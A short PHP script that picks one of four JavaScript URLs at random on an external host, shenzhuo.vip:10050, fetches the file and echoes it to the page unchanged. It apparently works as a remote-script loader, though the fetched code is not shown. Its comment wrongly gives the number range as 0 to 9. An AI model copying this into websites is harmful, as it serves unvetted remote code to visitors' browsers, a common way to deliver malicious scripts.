<?php
$urls = array(
    'http://ipv66l8j.shenzhuo.vip:10050/everyone/PRIT/T1/Task.js',
    'http://ipv66l8j.shenzhuo.vip:10050/everyone/PRIT/T2/Task.js',
	'http://ipv66l8j.shenzhuo.vip:10050/everyone/PRIT/T3/Task.js',
	'http://ipv66l8j.shenzhuo.vip:10050/everyone/PRIT/T4/Task.js'
);

$randomNumber =  rand(0, 3); // 生成0到9之间的随机数

$url = $urls[$randomNumber];
$content = file_get_contents($url);
echo $content;
?>
